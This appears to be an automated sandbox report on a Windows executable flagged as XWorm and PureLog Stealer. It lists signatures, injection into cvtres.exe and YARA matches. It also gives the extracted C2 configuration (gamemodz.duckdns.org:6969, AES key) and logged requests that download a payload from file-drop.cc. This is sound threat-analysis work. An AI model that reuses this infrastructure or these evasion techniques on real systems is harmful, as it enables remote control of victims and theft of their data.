Edit tour

Windows Analysis Report
KjCBSM7Ukv.exe

Overview

General Information

Sample name:	KjCBSM7Ukv.exe renamed because original name is a hash value
Original sample name:	fe7c4b36fca4fdf53789979a4a09c880.exe
Analysis ID:	1428548
MD5:	fe7c4b36fca4fdf53789979a4a09c880
SHA1:	89caf7f3b9f4d7d732ade5593e1958f6f025afa1
SHA256:	1b3711717d430ce33222b97fe8ec692741b7ac8bd9bfb4c2c975ae2f46b37470
Tags:	32exe
Infos:

Detection

PureLog Stealer, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

KjCBSM7Ukv.exe (PID: 6916 cmdline: "C:\Users\user\Desktop\KjCBSM7Ukv.exe" MD5: FE7C4B36FCA4FDF53789979A4A09C880)

cvtres.exe (PID: 6752 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

WerFault.exe (PID: 7180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 1668 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["gamemodz.duckdns.org"], "Port": "6969", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1661567494.0000000005A30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.1780455840.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000002.1780455840.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xde0f:$s6: VirtualBox 0xdd6d:$s8: Win32_ComputerSystem 0xf333:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf3d0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf4e5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xebbb:$cnc4: POST / HTTP/1.1
00000000.00000002.1662763939.00000000063D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1650015728.000000000268E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x10e57:$s6: VirtualBox 0x10db5:$s8: Win32_ComputerSystem 0x1237b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12418:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1252d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11c03:$cnc4: POST / HTTP/1.1
00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x81d6f:$s6: VirtualBox 0x9f623:$s6: VirtualBox 0x81ccd:$s8: Win32_ComputerSystem 0x9f581:$s8: Win32_ComputerSystem 0x83293:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa0b47:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x83330:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa0be4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x83445:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa0cf9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x82b1b:$cnc4: POST / HTTP/1.1 0xa03cf:$cnc4: POST / HTTP/1.1
00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1658667016.0000000005570000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1652553493.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1652553493.0000000004160000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1652553493.00000000037C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: KjCBSM7Ukv.exe PID: 6916	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: KjCBSM7Ukv.exe PID: 6916	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: KjCBSM7Ukv.exe PID: 6916	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: cvtres.exe PID: 6752	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.KjCBSM7Ukv.exe.4359f38.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.KjCBSM7Ukv.exe.26950a8.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.KjCBSM7Ukv.exe.26950a8.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.KjCBSM7Ukv.exe.4381f58.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.KjCBSM7Ukv.exe.5a30000.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.KjCBSM7Ukv.exe.276bd60.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.KjCBSM7Ukv.exe.276bd60.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc20f:$s6: VirtualBox 0xc16d:$s8: Win32_ComputerSystem 0xd733:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd7d0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xd8e5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xcfbb:$cnc4: POST / HTTP/1.1
0.2.KjCBSM7Ukv.exe.4359f38.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.cvtres.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.2.cvtres.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.cvtres.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xe00f:$s6: VirtualBox 0xdf6d:$s8: Win32_ComputerSystem 0xf533:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf5d0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf6e5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xedbb:$cnc4: POST / HTTP/1.1
0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xe00f:$s6: VirtualBox 0x2b8c3:$s6: VirtualBox 0xdf6d:$s8: Win32_ComputerSystem 0x2b821:$s8: Win32_ComputerSystem 0xf533:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2cde7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf5d0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2ce84:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf6e5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2cf99:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xedbb:$cnc4: POST / HTTP/1.1 0x2c66f:$cnc4: POST / HTTP/1.1
0.2.KjCBSM7Ukv.exe.39e8c18.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KjCBSM7Ukv.exe.3a10c38.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KjCBSM7Ukv.exe.5570000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KjCBSM7Ukv.exe.3ec0cb8.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KjCBSM7Ukv.exe.3ec0cb8.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KjCBSM7Ukv.exe.5570000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.KjCBSM7Ukv.exe.3a10c38.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.KjCBSM7Ukv.exe.39e8c18.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 18 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["gamemodz.duckdns.org"], "Port": "6969", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Multi AV Scanner detection for domain / URL

Source: https://www.file-drop.cc/D/6829ab/Fizvmrd.vdf	Virustotal: Detection: 11%	Perma Link
Source: gamemodz.duckdns.org	Virustotal: Detection: 16%	Perma Link
Source: https://www.file-drop.cc	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for submitted file

Source: KjCBSM7Ukv.exe

Virustotal: Detection: 14%

Perma Link

Machine Learning detection for sample

Source: KjCBSM7Ukv.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack	String decryptor: gamemodz.duckdns.org
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack	String decryptor: 6969
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack	String decryptor: USB.exe

Source: KjCBSM7Ukv.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.146.180:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: KjCBSM7Ukv.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Xml.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdbRSDS source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: KjCBSM7Ukv.exe, 00000000.00000002.1652553493.0000000004160000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1652553493.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002609000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1657555936.0000000004430000.00000004.08000000.00040000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: KjCBSM7Ukv.exe, 00000000.00000002.1652553493.0000000004160000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1652553493.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002609000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1657555936.0000000004430000.00000004.08000000.00040000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: protobuf-net.pdb source: KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Xml.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: mscorlib.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.pdbH source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Management.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Core.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdb source: WER40FF.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER40FF.tmp.dmp.4.dr

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: gamemodz.duckdns.org

Yara detected Generic Downloader

Source: Yara match	File source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /D/6829ab/Fizvmrd.vdf HTTP/1.1Host: www.file-drop.ccConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /D/6829ab/Fizvmrd.vdf HTTP/1.1Host: www.file-drop.ccConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: www.file-drop.cc

Source: KjCBSM7Ukv.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: cvtres.exe, 00000001.00000002.1781695360.000000000304C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.1781695360.000000000305C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.1781695360.0000000003064000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.1780455840.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: cvtres.exe, 00000001.00000002.1780735464.000000000136A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting6
Source: cvtres.exe, 00000001.00000002.1780735464.000000000136A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingy
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.1781695360.000000000304C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: KjCBSM7Ukv.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: KjCBSM7Ukv.exe	String found in binary or memory: https://discord.com/
Source: KjCBSM7Ukv.exe	String found in binary or memory: https://discord.com/#
Source: KjCBSM7Ukv.exe	String found in binary or memory: https://discord.com/2
Source: KjCBSM7Ukv.exe	String found in binary or memory: https://discord.com/6
Source: KjCBSM7Ukv.exe	String found in binary or memory: https://discord.com/9
Source: KjCBSM7Ukv.exe	String found in binary or memory: https://discord.com/:
Source: KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: KjCBSM7Ukv.exe, 00000000.00000002.1661838396.0000000005A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000023E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.file-drop.cc
Source: KjCBSM7Ukv.exe	String found in binary or memory: https://www.file-drop.cc/D/6829ab/Fizvmrd.vdf

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 172.67.146.180:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000002.1780455840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1650015728.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Code function: 0_2_0225E058	0_2_0225E058
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Code function: 0_2_0225DDA0	0_2_0225DDA0
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Code function: 0_2_063CD5F0	0_2_063CD5F0
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Code function: 0_2_063B0026	0_2_063B0026
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Code function: 0_2_063B0040	0_2_063B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_01658B58	1_2_01658B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_01654A68	1_2_01654A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_01654450	1_2_01654450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_01659428	1_2_01659428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_016514F0	1_2_016514F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_01658810	1_2_01658810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_01651D3A	1_2_01651D3A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 1668

Source: KjCBSM7Ukv.exe

Static PE information: invalid certificate

Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.000000000244C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1650015728.00000000026F8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient69.exe4 vs KjCBSM7Ukv.exe
Source: KjCBSM7Ukv.exe, 00000000.00000002.1658667016.0000000005570000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBrnuhepyot.dll" vs KjCBSM7Ukv.exe
